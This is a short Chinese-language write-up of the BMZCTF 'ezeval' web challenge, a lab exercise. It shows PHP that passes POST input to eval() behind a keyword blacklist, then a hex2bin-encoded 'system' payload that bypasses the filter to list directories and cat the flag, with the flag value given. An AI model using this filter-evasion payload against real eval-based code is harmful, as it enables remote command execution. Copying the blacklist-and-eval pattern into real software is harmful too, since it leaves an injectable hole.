BMZCTF WEB_ezeval
记一次做题思路
<?php
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
$cmd=htmlspecialchars($cmd);
$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include','var','print','scan','decode','system','func','ini_','passthru','pcntl','open','link','log','current','local','source','require','contents');
$cmd = str_ireplace($black_list,"BMZCTF",$cmd);
eval($cmd);
?>
分析源码
首先需要使用POST方法传递参数(用HackBar插件)
然后注意到里面两个函数htmlspecialchars()和str_ireplace()
1、htmlspecialchars()把预定义的字符 “<” (小于)和 “>” (大于)转换为 HTML 实体;
2、str_ireplace() 函数替换字符串中的一些字符(不区分大小写)。
搞清楚函数大致就懂了整个php的作用
用POST方式传递cmd的値,接着将cmd的値转换成HTML,然后设置黑名单,对于触发了黑名单的字符串,把它们替换成BMZCTF,最后再调用eval执行替换后的命令。
对于这种题,我首先想到用system(‘ls’)看一下所有目录文件,但是system在黑名单里,想办法绕过去。
百度之后,发现可以用hex2bin()函数。
system十六进制为73797374656d
cmd=hex2bin('73797374656d')('ls -l /');
绕过之后得到整个目录
发现了flag文件
cmd=hex2bin('73797374656d')('cat /flag');
得到falg BMZCTF{15f365a946864ff5a48f2a7be7f77547}